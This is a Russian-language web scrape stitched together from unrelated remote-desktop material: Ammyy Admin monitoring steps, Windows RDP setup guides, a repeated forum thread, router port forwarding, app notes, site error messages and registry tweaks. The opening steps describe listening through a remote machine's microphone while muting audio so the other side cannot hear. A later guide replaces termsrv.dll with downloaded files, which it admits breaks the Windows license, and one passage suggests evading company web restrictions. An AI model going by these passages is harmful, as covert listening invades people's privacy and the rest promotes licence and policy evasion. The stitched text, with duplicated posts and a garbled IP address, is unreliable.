  3. После выбора опции «Только просмотр» для дальнейших операций понадобится подтвердить вход нажатием на «Подключиться».
  4. В открывшемся окне аутентификации необходимо написать придуманный ранее пароль.
  5. С помощью режима «Voice Chat» или кнопки голосового прослушивания можно получить доступ к микрофонам машины. Чтобы с другой стороны не услышали аналогичную связь, необходимо в меню главного окна «Ammyy» найти пункт «Настройки» и перейти на вкладку «Общие». Здесь для опции «Audio Recording Device» установить режим «OFF». Если звука не будет с ПК клиента, нужно проверить подключение данной настройки на оборудовании.
  6. Как только подключение осуществится, будет выведен экран компьютера, на котором производится мониторинг действий.
  7. Для остановки работы приложения его нужно закрыть.

Вам будет интересно

Приветствую вас на моем блоге. Речь в этом статье пойдет про лицензию на операционную систему…

Привет всем! Если вы читаете эту статью значить вы хотите защитить систему от случайного его…

Многие пользователи рано или поздно задумываются над безопасностью данных на компьютере. Особенно если оберегать их требуется…

В этот раз мы разберем процесс установки темы для Windows 7. Процедура сама по себе…

Клиент RDP на Windows

Самым первым и наиболее распространенным примером программы для работы с протоколом удаленного доступа является средство для подключения к удаленному рабочему столу на Windows. Собственно, протокол RDP и разрабатывался для этой операционной системы. А уже потом его начали использовать в других ОС.

На сегодняшний день в любой версии Виндовс есть встроенный инструмент под названием «Подключение к удаленному рабочему столу». Его можно найти в меню «Пуск» или же с помощью поиска. Оно везде называется одинаково.

Чтобы его использовать, необходимо сначала настроить компьютер, к которому вы будете подключаться, то есть с рабочим столом которого вы собираетесь работать. Для этого сделайте вот что:

  1. Сначала нужно узнать IP-адрес компьютера, чтобы потом дать его другому устройству, с которого и будет осуществляться управление первым. Для этого выполните следующие действия:
  • запустите окно выполнения программ при помощи одновременного нажатия кнопок Win и R на клавиатуре;
  • в открывшемся окне, в единственном поле ввода, введите «cmd» и нажмите Enter на клавиатуре – тем самым вы запустите командную строку;

RDP клиент

Рис. 3. Команда для запуска командной строки в окне выполнения программ

  • в командной строке введите команду «ipconfig» и снова нажмите Enter;
  • откроется вся доступная сетевая информация, найдите там строку «IPv4-адрес» — напротив него и будет IP-адрес, запомните его (!).

RDP клиент

Рис. 4. Информация о сети в командной строке

Как видим, в нашем примере IP-адрес 192.168.1.88.

  1. Теперь следует включить возможность доступа к компьютеру с помощью инструмента для удаленного управления. Для этого сделайте следующее:
    • в меню «Пуск» откройте «Панель управления»;
    • нажмите на раздел «Система и безопасность»;

RDP клиент

Рис. 5. Раздел «Система и безопасность» в панели управления

  • в следующем окне нажмите на подраздел «Система»;

RDP клиент

Рис. 6. Подраздел «Система»

  • в меню слева выберете «Дополнительные параметры системы»;
  • в открывшемся окне перейдите на вкладку «Удаленный доступ»;
  • поставьте отметки напротив пунктов, выделенных на рисунке 7 цифрами 1 и 2;
  • закройте все окна, а перед этим нажмите «Применить».

RDP клиент

Рис. 7. Разрешение удаленного управления в разделе «Система»

Теперь вы можете совершенно спокойно подключаться к данному компьютеру. Эта операция тоже совсем несложная. Выполняется она в следующей последовательности:

  1. Зайдите в меню «Пуск», выберете там список всех программ, затем раздел «Стандартные» и нажмите на инструмент под названием «Подключение к удаленному рабочему столу». Найти его будет несложно.

RDP клиент

Рис. 8. Инструмент для подключения к удаленному рабочему столу в меню «Пуск»

  1. Дальше в следующее окно нужно ввести тот IP-адрес, который мы определили на одном из предыдущих этапов. Напомним, что в нашем примере это 168.1.88. Этот адрес и нужно вводить в это самое окно. Когда это сделано, переходите к следующему шагу, но кнопку «Подключить» пока что не нажимайте. Вместо этого нажмите на надпись «Параметры», которая находится немного ниже и левее от поля ввода адреса.

RDP клиент

Рис. 9. Окно инструмента для подключения к удаленному рабочему

  1. Важно, чтобы вы имели возможность работать не только с папками и файлами, а еще и с устройствами, подключенными к компьютеру, над которым будет осуществляться управление. Поэтому в выпавшем окне перейдите на вкладку «Локальные ресурсы» и поставьте там галочки напротив пунктов «Принтеры» и «Буфер обмена». Вот теперь можно нажимать кнопку «Подключить» и, таким образом, переходить к следующему шагу.

RDP клиент

Рис. 10. Параметры подключения к удаленному компьютеру

После этого произойдет подключение к указанному компьютеру по его адресу. Некоторые устанавливают на свои устройства систему учетных записей. В таком случае для подключения придется ввести логин и пароль. Но если на первом этапе описанной выше настройки вы ничего не делали для того, чтобы установить такую вот систему, ничего вводить не нужно.

Все просто! Не правда ли?

Теперь вы знаете, как использовать самый простой вариант RDP и совершенно спокойно можете установить удаленное подключение. Если у вас при этом возникнут какие-то вопросы или сложности, пишите об этом в комментариях ниже. Мы обязательно ответим.

А пока, для более глубокого понимания вопроса, рассмотрим некоторые другие программы, которые работают в качестве RDP клиентов, то есть позволяют осуществлять удаленное управление компьютером.

Коллеги, очень надеюсь на Вашу помощь, так как самостоятельно уже не разобраться.

Есть машина под управлением Windows 8.1, на которой настроен удаленный рабочий стол. К ней можно подключиться с помощью reminna, встроенным клиентом из под windows 7, MPS 2012, но ни в какую не получается подключиться из под 8.1. При вводе пароля "попытка входа в систему неудачна". В настройках стоит подключаться, если серверная проверка подлинности завершается сбоем, все ОС лицензионные и активированные.

Журнал событий можно скачать по этой ссылке http://1drv.ms/1FozmDH

В журнале сначала попытка подключения из под 8.1 заканчивается

24.02.2015 19:05:45 Причина отключения: 0

Далее успешная попытка подключения из под windows MPS 2012.

Заранее спасибо за помощь!

  • Изменено Crazy__Duck 24 февраля 2015 г. 16:51

Ответы

Все оказалось тривиально, нужно было в поле "домен" ввести имя машины.

Странно, что при подключении с Windows MPS 2011 или 7 это не требуется.

  • Помечено в качестве ответа Dmitriy Vereshchak Microsoft contingent staff, Moderator 5 марта 2015 г. 12:32

Все ответы

Возможно, что это поможет и Вам.

Мнения, высказанные здесь, являются отражением моих личных взглядов, а не позиции корпорации Microsoft. Вся информация предоставляется "как есть" без каких-либо гарантий.

  • Изменено Dmitriy Vereshchak Microsoft contingent staff, Moderator 26 февраля 2015 г. 8:42

Посмотрите что у вас здесь, переключите на противоположный тип безопасности и try to reproduce the problem.

спасибо, поменял на "0", "попытка входа в систему неудачна".

Забыл уточнить, чтобы Вы на обеих машинах поменяли

все обновления на обоих машинах стоят, 2984006 в том числе.

А зачем на обоих машинах менять? это же профиль подключения или я ошибаюсь?

Все оказалось тривиально, нужно было в поле "домен" ввести имя машины.

Странно, что при подключении с Windows MPS 2011 или 7 это не требуется.

  • Помечено в качестве ответа Dmitriy Vereshchak Microsoft contingent staff, Moderator 5 марта 2015 г. 12:32

Попробуйте набрать пароль в ручную, если сработает то поздравляю это баг винды, что-то похожее на непечатные символы при правке кода в bat файле обычным виндовским блокнотом. Винда неадекватна и с этим нужно както мириться. Суть в том что какимто образом в строке пароля уже присутствует невидимый символ, нужно набрать там что-то стереть и потом вставить Ваш пароль.

Но это еще полбеды, вы на пути разрушения рдп, если у вас не одна впс а десятки или даже сотни, со временем у винды что-то случается (как всегда), возможно переполняется счетчик подключений или больше не выделяется какаято область памяти на последней стадии после ввода пароля просто ничего непроисходит, решение перебить винду, или поставить виртуалку

Попробуйте набрать пароль в ручную, если сработает то поздравляю это баг винды, что-то похожее на непечатные символы при правке кода в bat файле обычным виндовским блокнотом. Винда неадекватна и с этим нужно както мириться. Суть в том что какимто образом в строке пароля уже присутствует невидимый символ, нужно набрать там что-то стереть и потом вставить Ваш пароль.

Но это еще полбеды, вы на пути разрушения рдп, если у вас не одна впс а десятки или даже сотни, со временем у винды что-то случается (как всегда), возможно переполняется счетчик подключений или больше не выделяется какаято область памяти на последней стадии после ввода пароля просто ничего непроисходит, решение перебить винду, или поставить виртуалку

Данной теме более трех лет, тема не актуальна.

Если у вас проблема создайте новую тему.

Не стоит некропостить, это ничему хорошему не приведёт

Я не волшебник, я только учусь MCP CCNA. Если Вам помог чей-либо ответ, пожалуйста, не забывайте нажать на кнопку "Пометить как ответ" или проголосовать "полезное сообщение". Мнения, высказанные здесь, являются отражением моих личных взглядов, а не позиции работодателя. Вся информация предоставляется как есть без каких-либо гарантий. Блог IT Инженера, Twitter, YouTube, GitHub, Instagram

Для того, чтобы компьютер был доступен по сети интернет — желательно обзавестись статичным ip. Можно найти другие способы или сервисы, для получения статического адреса или имени. В этой статье их рассматривать не буду.

Общая схема доступа показана на рисунке ниже

Общая схема RDP

Сначала нас встречает роутер, затем приветствует Firewall и только потом служба RDP. Чтобы служба была доступна из вне необходимо открыть и пробросить порт на роутере. Делать это будем на роутере Asus WL520gc.

Настройка Asus WL520gc для подключения RDP

DHCP сервер

В моей конфигурации всем клиентам в сети ip раздается DHCP сервером на роутере. Для проброса порта необходимо знать точный IP адрес машины, куда отправлять запросы.

В настроке пула динамических адресов сделаем зазор в 1 адрес. Так если адрес сети 192.168.1.1, начнем выдавать адреса с 3-го (192.168.1.3)

Настройка роутера 1

Далее в разделе ручное назначение IP адресов добавим правило выдачи адреса по мак адресу (как узнать мак адрес — ниже). Прописываем правило выдачи по мак адресу — IP адрес 192.168.1.2

Ручное назначение IP адресов

Получение MAC адреса машины

Открываем Network and Sharing Center, выбираем сеть к которой подключены и используем для работы с роутером.

как получить мак адрес

Открываем детали подключения

Детали подключения к сети

В окне детальной информации копируем Physical Address (без тире) и вставляем в настройки роутера.

Читайте также:  Изменение файла подкачки в Windows 8

MAC адрес машины

Проброс портов

Далее, знаем что всегда имеем статичный адрес 192.168.1.2 можем настроить проброс портов. В этом месте можно указать любой порт, который нам нравится (т.к. физически будем взаимодействовать с портом роутера, а он может транслировать на любой порт на локальной машине). Так и сделаем, для примера настроим проброс с порта 11111 на стандартный 3389.

Во вкладке NAT Settings > Virtual Server включаем виртуальный сервер. Добавляем правило. И только после этого нужно сохранить и перегрузить ройтер. Настройки вступят в силу после перезагрузки.

настройка проброса портов

Проверить правильно ли мы настроили проброс портов, firewall и RDP можно на сайте http://ping.eu/port-chk/. Вводим свой IP и порт и нажимаем Go.

Сканер портов

Видно, что порт открыт и можно получить доступ. Удачной настройки RDP. Кстати, есть Microsoft Remote Desktop для iPad iPhone (iOS), который очень удобен в дороге или при недоступности стационарной машины.

Подключение к рабочему столу с удаленного компьютера — это самая базовая вещь в администрировании Windows Server, но несмотря на это, вопросов как подключиться по RDP к серверу очень много.

RDP (Remote Desktop Protocol) — это протокол удаленного рабочего стола. Позволяет подключиться к серверу под управлением ОС Windows. Для подключения требуется наличие специальной программы — клиента. Такой вид подключения предоставляет стандартный графический интерфейс OC Wondows.

Подключиться по RDP можно только к серверу на Windows. Для подключения необходимо применять нативный клиент Microsoft — «Подключение к удаленному рабочему столу». Он находится: Пуск -> Все программы -> Стандартные , запустить Подключение к удаленному рабочему.

Либо, в ряде случаев — альтернативные клиенты — Xfreerdp, Remmina. В качестве хоста для подключения необходимо указывать IP адрес сервера, в качестве данных для авторизации — предоставленную в активационной письме пару логин/пароль.

Настройка RDP

По RDP можно подключаться даже со смартфонов, для этого нужно установить специальный клиент. У нас есть инструкция как подключиться к по RDP к серверу на Windows со смартфона на Android или IOS.

О программе

Что нового

Новое в версии 10.6.8 (macOS) (16.08.2021):

Новое в версии 8 8.1.82.445 (Android) (26.04.2021):

  • Исправлена проблема, когда изображения отображались как символы.
  • Добавлено всплывающее окно, информирующее пользователей о том, что это приложение больше не поддерживается Microsoft.

Новое в версии 10.2.3 (iOS) (07.12.2020):

  • В этом выпуске устранены сбои и исправлены проблемы, связанные с параметром отображения представления Zoom. Кроме того, оптимизирован параметр «Использовать весь экран» для отображения только на применимых устройствах iPad и изменены доступные разрешения на некоторых iPhone и iPad.

Системные требования

Операционные системы:

  • Windows 10 / 8.1 / 7 (32-bit и 64-bit)
  • macOS 10.13 и новее
  • Android 4.1 и выше
  • iOS 13.0 и новее
  • ChromeOS 53 и новее

Вы можете подключаться к ПК, работающим под управлением следующих операционных систем Windows:

  • Windows 10 (Pro / Корпоративная)
  • Windows 8 (Корпоративная / Профессиональная)
  • Windows 7 (Профессиональная / Корпоративная / Максимальная)
  • Windows Server 2008 / 2008 R2 / 2012 / 2012 R2 / 2016
  • Windows Multipoint Server 2011 / 2012
  • Windows Small Business Server 2008 / 2011

Следующие компьютеры позволяют запускать шлюз удаленных рабочих столов:

  • Windows Server 2008 / 2008 R2 / 2012 / 2012 2 / 2016
  • Windows Small Business Server 2011

Следующие операционные системы можно использовать в качестве серверов веб-доступа к удаленным рабочим столам и приложениям RemoteApp:

  • Windows Server 2008 R2 / 2012 / 2012 R2 / 2016

Полезные ссылки

Подробное описание

Microsoft Remote Desktop (Клиент удаленного рабочего стола Microsoft) — приложение для удалённого доступа к компьютеру с любого места и устройства. Вы можете управлять операционной системой, запускать приложения и выполнять любые действия, как будто вы находитесь за компьютером.

Для подключения можно использовать компьютер, ноутбук или мобильные устройства под управлением Android или iOS. Необходимо заранее разрешить удалённое подключение на нужном компьютере, а затем подключиться с использованием IP-адреса, логина и пароля удаленной системы.

Microsoft Remote Desktop может быть полезным инструментом при удалённой работе или совместном использовании компьютера. Вы можете не только управлять файлами но и полноценно работать в приложениях, установленных на удалённой системе.

Возможности Microsoft Remote Desktop

  • Удаленный доступ к компьютерам с Windows и Windows Server.
  • Доступ к удаленным ресурсам.
  • Удаленное подключение с помощью шлюза удаленных рабочих столов.
  • Подключение с компьютера, ноутбука, телефона или планшета.
  • Удобное управление подключениями.
  • Качественное потоковое видео и звук.
  • Поддержка жестов.

Оценка пользователей

Другие программы

/>ZOOM
Программа для организации онлайн-конференций и трансляций

/>TeamViewer
Удаленный доступ к компьютерам и мобильным устройствам через Интернет

/>Удаленный рабочий стол Chrome
Удаленный доступ к компьютерам с помощью браузера Chrome

Установка и настройка

Для установки доступны MSI файл установки и zip архив с программой. В данной статье будет рассмотрен пример с установкой программы из zip архива.

  1. Скачиваем и распаковываем содержимое архива. Должны появится следующие файлы:
    • install.bat — пакетный файл установки RDP Wrapper в систему;
    • RDPCheck.exe — утилита для локальной проверки работы сервера удаленного рабочего стола;
    • RDPConf.exe — утилита для настройки сервера RDP Wrapper;
    • RDPWInst.exe — файл установки RDP Wrapper;
    • uninstall.bat — пакетный файл удаления RDP Wrapper из системы;
    • update.bat — пакетный файл для обновления RDP Wrapper из интернета.
  2. Для быстрой установки в систему RDP Wrapper, достаточно воспользоваться файлом install.bat, который необходимо запустить с правами администратора.
  3. После запуска появится черное окошко, где в случае успешной установки будет написано Successfully installed. Для его закрытия достаточно нажать любую клавишу клавиатуры.
  4. Для проверки работы удаленного рабочего стола можно запустить утилиту RDPCheck.exe — она выполнит подключение к локальному серверу удаленного рабочего стола.

RDP соединение с Windows 7/8 на Server 2012 идет медленно

Я недавно установил Windows Server 2012 в целях разработки в нашем офисе и сразу заметил, что подключение через RDP идет медленно. Время от времени подключение может занять 5-10 секунд, тогда как подключение к любому из наших блоков Windows 7 или Windows 2008 R2 занимает не более 1-3 секунд.

Сначала я записал это на саму коробку, нуждающуюся в обновлении драйвера или чем-то еще, но только вчера я установил Windows 8 на свой настольный ПК, и подключение из дома к этому компьютеру с Windows Server 2012 дает тот же результат. При «защите удаленного соединения» возникает пауза 3-4 секунды, а затем снова «при настройке удаленного сеанса».

Я не вижу никаких предупреждений в журнале событий, и после подключения не возникает никаких проблем с производительностью. Известна ли проблема с подключениями RDP из Windows 7 или 8 к системам Windows Server 2012? Что-нибудь, что я должен искать?

Я испытал ту же проблему и решил ее, добавив параметр реестра, указанный здесь .

  1. Откройте RegEdit на компьютере с Windows Server.
  2. Перейдите к этому ключу реестра в дереве слева:

HKEY_LOCAL_MACHINE \ SYSTEM \ CurrentControlSet \ Services \ Tcpip \ Parameters

Это случилось со мной раньше. Я решил это, перейдя на Remote Desktop Connection -> Experience вкладку и убедившись, что у меня не выбрано «Автоматически определять качество соединения». Я также снял все галочки в разделе «Разрешить следующее».

У меня такая же проблема. И я пытаюсь сделать 2 шага.

Step1: делай как «schellack» скажи

Откройте RegEdit на компьютере с Windows Server. Перейдите к этому ключу реестра в дереве слева: HKEY_LOCAL_MACHINE \ SYSTEM \ CurrentControlSet \ Services \ Tcpip \ Parameters

Щелкните правой кнопкой мыши справа и добавьте новое значение DWORD (32-разрядное). Задайте для имени значения значение DisableTaskOffload, а для значения значения — 1.

Шаг 2: И отключите службу перечисления смарт-карт устройства:

  • Перейдите в «Выполнить» -> «Службы» -> «Перечень устройств смарт-карт» -> «Отключить».

Я думаю, что основной причиной является то, что смарт-карта является причиной задержки удаленного рабочего стола. Я надеюсь, что это помогает кому-то, кто имеет ту же проблему.

Вы можете диагностировать это несколькими различными способами —

Используйте имя NetBIOS, затем полное доменное имя, затем IP-адрес при использовании приложения RDP. обычно это задержка разрешения имени, и ее можно разрешить, используя полное доменное имя вместо более короткого имени NetBIOS. Обычно после первого подключения последующие подключения должны разрешаться быстрее, поскольку имя будет кэшироваться на локальном компьютере.

Если это компьютер, к которому вы будете регулярно подключаться И этот компьютер имеет статический IP-адрес, вы можете добавить его в локальный файл HOSTS, что должно привести к более быстрому согласованию, к которому вы привыкли.

Проблема связана с функцией теневого указателя мыши.

В RDP это приводит к прыгающей / медленной мыши.

Исправьте это поведение с помощью мыши -> Указатель -> Включить тень указателя (отключить)

Проблема, которая привела меня на эту страницу, была связана с проблемой подключения к удаленному рабочему столу. Я сделал совершенно новую установку Server 2012 в VM ESXi 5.5. Все серверы были настроены нормально, роли DC и DHCP включены, больше ничего.

Консоль ESXi действовала как очарование жизни. Перезагрузка и подключение немедленно. Но когда пришло время для подключения с удаленного рабочего стола, подключение заняло несколько минут, прежде чем открыть. Я не понял почему, потому что на коробке 2008 года, кроме того, это было хорошо!

Ну, все это время проблема была связана с остановкой службы удаленного реестра. Я не смог запустить его, потому что он говорил что-то о пользователе соединения не то же самое, что другой связанный сервис.

Решение: вручную измените параметры подключения в настройках удаленного реестра для NT Authority \ LocalService, пароль не требуется. Теперь соединение RDP проходит нормально и оно подключается сразу после того, как я ввожу пароль администратора моего домена.

Обновление протокола RDP в системе Windows

Для корректной работы удаленного доступа к приложению 1С может потребоваться обновить терминальный клиент Windows.

Если вы работаете с системой на базе Windows XP — рекомендуем установить версию 7.0. Эта версия требует установленный Service Pack 3.

Скачайте подходящее обновление в зависимости от вашей операционной системы:

Если вы работаете с системой на базе Windows 7 или Windows 8 — рекомендуем установить версию протокола RDP 8.1.

Последовательно перейдите по указанным ссылкам и установите подходящее по разрядности обновления для вашей системы:

Вы сможете самостоятельно установить обновление, посмотрев данный видеоролик:

Обращаем ваше внимание, все необходимые обновления для протокола RDP могут быть установлены автоматически через «Центр обновления Windows» из раздела необязательные.

Произошла ошибка

В данный момент наблюдаются проблемы с доступом к сайту 1Cfresh.com.

Для завершения регистрации перейдите по ссылке из письма, которое вы получили после начала регистрации или свяжитесь с нами по телефону +7(800)555-2384

Произошла ошибка

Вы уже начинали регистрироваться с этим электронным адресом.

Пожалуйста, используйте другой e-mail.

Или для завершения регистрации перейдите по ссылке из письма, которое вы получили после начала регистрации и свяжитесь с нами по телефону +7(800)555-2384

Произошла ошибка

В данный момент наблюдаются проблемы при регистрации.

Для завершения регистрации перейдите по ссылке из письма, которое вы получили после начала регистрации или свяжитесь с нами по телефону +7(800)555-2384

Произошла ошибка

Введён неверный ПромоКод

Внимательно проверьте полученный вами ПромоКода и введите правильные символы

Произошла ошибка

ПромоКод заблокирован

Произошла ошибка

Срок действия этого ПромоКода истек

Произошла ошибка

Не пройдена проверка на автоматическую регистрацию (роботом). Попробуйте еще раз.

Произошла ошибка

Не пройдена проверка на автоматическую регистрацию (роботом). Попробуйте еще раз.

Делаем из Windows 8.1 сервер терминалов

Очень часто в организациях встает задача получения единовременного доступа нескольких пользователей к одному компьютеру в сети. Это может быть какой-то компьютер с уникальным для организации ПО, которое имеется только в единственном экземпляре. Вроде бы ничего страшного нет в том, чтобы подцепиться к этому компьютеру, сделать свою работу на этой программе, сохранить результат на файловое хранилище и все. Однако на деле не все так просто.

Windows имеет в своем составе проприетарный протокол RDP, который позволяет подключиться к любому компьютеру под управлением «окон», если на нем включена данная функция. Казалось бы, ввел команду mstsc, там уже ввел параметры ip и иные данные и пользуйся удаленным компьютером.

Однако никто не отменял всякие ограничения десктопных версий. В клиентских версиях Windows можно единовременно работать только одному пользователю, будь то локальный или удаленный. Хотите большего – пожалуйста, разворачивайте в организации Windows Server, покупайте на него лицензии сервера терминалов и пользуйтесь подобным решением. Все легально и просто. Но стоит денег, причем, немалых.

Вторым вариантом мог бы стать Linux сервер с развернутым на нем xRDP и запуском на нем многих Windows программ под Wine. Но нужно понимать, что далеко не все программы запустятся на нем, особенно те, которые используют Direct X, все равно скорость работы такой системы будет оставлять лучшего. Но зато затраты будут минимальны. И все легально.

Тем не менее, когда нужно пользоваться всего парой-тройкой программ по удаленке и то непостоянно, то приведенные выше примеры просто подобны стрельбе из пушки по воробьям. Гораздо проще из десктопной версии Windows патчем сделать многопользовательский сервер терминалов.

Учтите, что данный способ нарушает лицензию Windows и вы все делаете на свой страх и риск. Если вас все устраивает, тогда давайте приступим.

Наверняка вы слышали, что в основе серверных операционок от Microsoft лежит тоже самое ядро, что и в десктопных версиях. Да, оно дополнено и переработано с учетом специфики, но суть остается такой же. Я просто написал это к тому, чтобы вы поняли, почему описанный способ будет работать без проблем.

Терминальный сервер Windows довольно-таки уникальная технология и своего рода прорывная. Он позволяет нескольким пользователям заходит и работать в системе под своими учетными записями, абсолютно не мешая друг другу. Подобную связку можно сделать на Linux, используя xRDP, однако там всегда что-то идет криво, в противовес винде.

Но только если в случае с Linux в терминальный сервер можно превратить обычный десктопный ПК с такой же версией ОС, то в Windows это не позволяет. Тем не менее, это обходится достаточно читерским способом – патчится библиотека, отвечающая за терминальный сервер.

Итак, патч предполагает собой замену оригинального системного файла %SystemRoot%\System32\termsrv.dll (библиотека, используемая службой Remote Desktop Services).

Перед заменой системной библиотеки создадим резервную копию файла termsrv.dll командой:

copy c:\Windows\System32\termsrv.dll termsrv.dll_old

Теперь, если что-то пойдет не так, всегда можно вернуться к начальной конфигурации, заменив текущий файл оригинальным termsrv.dll_old

Скачайте нужный архив для своей версии Windows. Для 32 разрядной Windows 8.1 можете скачать здесь, для 64 битной –здесь. Не забудьте переименовать файл!

В Windows 8 предварительно нужно изменить значение следующих ключей в ветке реестра HKLM\System\CurrentControlSet\Control\Terminal Server\:

  • fDenyTSConnections (DWORD) —
  • fSingleSessionPerUser (DWORD) —

Затем переходим в каталог C:\Windows\System32, находим файл termsrv.dll и открываем его свойства.

Нам нужно перейти во вкладку «Безопасность» и нажать кнопку «Изменить». В списке доступа найдите группу локальных администраторов и предоставьте ей полные права на файл.

Следующий шаг перед заменой файла библиотеки, открыть консоль управления службами (services.msc) и остановить службу Удаленных рабочих столов (Remote Desktop Services)

Теперь нужно скопировать скачанный вами файл termsrv.dll в C:\Windows\System32 с заменой файла и запустить службу удаленных рабочих столов. Перезагрузите компьютер.

Не забудьте проверить, что вы разрешили подключение к вашему компьютеру по RDP. Если вы все сделали правильно и ошибок система не выдала, то, поздравляю, вы только что сделали из Windows 8.1 Pro свой сервер терминалов!

Терминальный сервер и Windows 10

Для тех пользователей, кто обновился до Windows 10 и хочет из нее сделать сервер терминалов, у меня есть отличная новость -описанный способ в статье применим к этой операционке. Так что вы спокойно можете сделать из Windows 10 сервер терминалов

Как обновить версию RDP клиента на рабочем месте

Задача: Ввиду того факта, что помимо Windows 7 есть уже Windows 8, Windows 8.1, Windows 10, Server 2012 R2, Server 2016 то чтобы к ним подключаться через удаленный рабочий стол скорее всего необходимо иметь соответствующую версию приложения, а вот как проверить текущую и что нужно чтобы обновить. Вот об этом и пойдет речь в сегодняшней мини заметке.

В качестве примера буду использовать ось Windows 7 x86 Pro SP1

Узнать какая сейчас версия клиента RDP можно следующим образом:

Пуск — Все программы — Стандартные — Подключение к удаленному рабочему столу, затем правой кнопкой мыши щелкаем по верхней строке, как показано на скриншоте ниже и выбираем из списка «О программе»

Узнаем версию протокола RDP клиентаВот так информация которой я буду оперировать в дальнейшем:

  • Подключение к удаленному рабочему столу.
  • Версия оболочки 6.1.7601
  • Версия управляющего элемента: 6.1.7601
  • Поддерживается проверка подлинности на уровне сети.
  • Протокол удаленного рабочего стола 7.1

Информация о RDP версии протокола на Windows 7

Чтобы использовать более новую версию, т. к. для установки 8.1 необходимо в системе наличие установленных пакетов обновления: под свою архитектуру, а после перезагрузиться.

  • Windows6.1-KB2574819-v2-x86.msu
  • Windows6.1-KB2830477-x86.msu
  • Windows6.1-KB2857650-x86.msu
  • Windows6.1-KB2913751-x86.msu

После проверяю, какая сейчас версия клиента подключения к удаленному рабочему столу. Действия аналогичны выше представленным, итого:

  • Подключение к удаленному рабочему столу.
  • Версия оболочки 6.3.9600
  • Версия управляющего элемента: 6.3.9600
  • Поддерживается проверка подлинности на уровне сети.
  • Протокол удаленного рабочего стола 8.1 поддерживается.

Проверка свойств файла mstsc.exe:

C:\Windows\system32>wmic datafile where name=»C:\\windows\\system32\\mstsc.exe» get manufacturer, name, version

Manufacturer Name Version

Microsoft Corporation c:\windows\system32\mstsc.exe 6.3.9600.16415

По сути получается, что просто установив обновления мы можем обновить версию клиента RDP что не может ни радовать.

Задача выполнена, с уважением Олло Александр aka ekzorchik.

Для чего можно использовать удалённый доступ по RDP?

Организации, как правило, используют RDP-сервера для совместной работы в программе 1С. А некоторые, даже, разворачивают на них рабочие места пользователей. Таким образом, пользователь, особенно, если у него разъездная работа, может при наличии 3G интернета или отельного/кафешного Wi-Fi – подключаться к своему рабочему месту удалённо и решать все вопросы.

В некоторых случаях домашние пользователи могут использовать удалённый доступ к своему домашнему компьютеру, чтобы получить какие-то данные с домашних ресурсов. В принципе, служба удалённого рабочего стола позволяет полноценно работать с текстовыми, инженерными и графическими приложениями. С обработкой видео и звука по вышеприведённым причинам – работать не получится, но всё равно – это очень существенный плюс. А ещё можно на работе просматривать закрытые политикой компании ресурсы, подключившись к домашнему компьютеру безо всяких анонимайзеров, vpn и прочей нечисти.

RDP клиент для операционной системы Windows 7

RdpПротокол RDP позволяет подключиться к компьютеру, который подключён как к локальной сети, так и находится в любой точке нашей планеты. С помощью этого протокола пользователь сможет увидеть файлы и программы на другом компьютере (как на сервере, так и на терминале), запускать их, работать с ними. Но для начала RDP нужно настроить.

Нажимаем в Windows кнопку Start и открываем Control Panel. Далее заходим в «Систему безопасности», открываем «Система» и нажимаем на вкладку «Удалённый доступ». Проставляем «галочку» возле пункта «Предоставить возможность подключения к другим компьютерам с рабочими столами любой версии».

Свойства системы - Удаленный доступ

Затем приступаем к настройке RDP-клиента. Сначала рассмотрим, для чего предназначен клиент. Это такие компоненты, существующие, кстати, в любой операционной системе, работа которых заключается в подключении к серверу (установленном на подключаемом компьютере). В Windows «Семёрке» клиентом, работающим для RDP-протокола, является встроенная программа MsTsc.exe. Теперь расскажем о настройке клиента.

Для этого в Windows нажимаем «Start» и заходим в пункт меню Run. В поле ввода открывающегося окна прописываем mstsc и жмём «Далее». При желании получения обычного доступа к подключаемому компьютеру в поле ввода открываемого окна клиента прописывается его IP-адрес. Далее нажимаем на «Энтер».

Всё. Настройку мы завершили.

При желании настроить параметры экрана, качество звуков выполнения различных действий на подключаемом компьютере и так далее, необходимо выполнить настройку дополнительных параметров подсоединения (рисунок ниже).

Подключение к удаленному рабочему столу

Также можно установить глубину цвета, фон рабочего стола, яркость дисплея. Открыв раздел «Удалённое звуковое сопровождение», можно настроить качество звуков для какого-либо действия.

Также при медленной работе RDP-клиента есть возможность его настроить.

Все пользователи, кто хотя бы раз работал с несколькими системами windows, постоянно жалуются на медленную работу RDP-приложений. Медленную работу программ можно назвать постоянной тенденцией всех программистов из Микрософт. Поэтому ускорять RDP пользователю приходится самостоятельно с помощью системного реестра, который можно редактировать либо путём ввода слова regedit в поле ввода открывшегося окна run, либо посредством внесения изменений в reg-файл. Причиной замедления RDP-канале в 100Mb (1Gb) являются настройках сервера и клиента. В большей степени — клиента. Даже при наличии хороших каналов именно rdp-клиент намеренно ограничивает скорость Update (обновление). Такая тенденция пошла ещё со времён DialUp-модемов. Но в современную эпоху мощных компьютеров такие настройки уже утратили всякую актуальность.

Все его настройки находятся в системном реестре в разделе (смотри нижнюю часть рисунка):

Редактор реестра

Прежде всего обращаем внимание на параметр MinSendInterval , значение которого установлено равным 120 мс (это 8 кадров за одну секунду). В Интернете часто рекомендуют в Windows (для серверов) прописать для этого параметра 1, но 5-10 для подсоединения к компьютеру через локальную сеть вполне хватит.

Параметр BitmapCacheSize указывает объём буфера памяти для графики. К примеру, значение 1000h соответствует 24,5 МБ. Измените это значение в Windows (как на сервере, так и на терминале) согласно графическим возможностям вашей видеокарты.

Для параметра BitmapPersistCacheSize (объём кэша для изображений) также в системном реестре Windows (как на сервере, так и на терминале) нужно прописать более высокое значение.

Параметр OrderDrawThreshold рекомендуют в качестве значения устанавливать 1 мс. Параметр PinConnectorBar можно оставить прежним. Он никак не повлияет на скорость подключения. В результате после обновления в реестре Windows (как на сервере, так и на терминале) должны получить такие настройки:

Настройки реестра

Кстати, вручную изменять значения реестра нужно только после обновления Windows.

Доступ к приложениям в окне через RemoteAPP

Итак всем привет и хорошего дня, сегодня я покажу на практике, как сделать следующее:

Задача: на терминальном сервере активировать службу RemoteAPP и опубликовать приложение клиента на подключение к развернутому кластеру 1C.

На сервер установлен гипервизор ESXi, а уже внутри него под каждую задачу развернуты виртуальные системы:

  • Имеется доменnemdomb.local
  • Имеется развернутый терминальный сервер
  • Имеется сервер базы данных и кластер (все на одной машине, то лучше разделять по отдельным системам
  • и отдельная рабочая станция.

Но пока как заготовка, терминальный сервер я разверну на сервере базы данных и кластере (все на одной машине).

На терминальном сервере рекомендую пользовательский профили вынести на отдельный диск вместо системного:

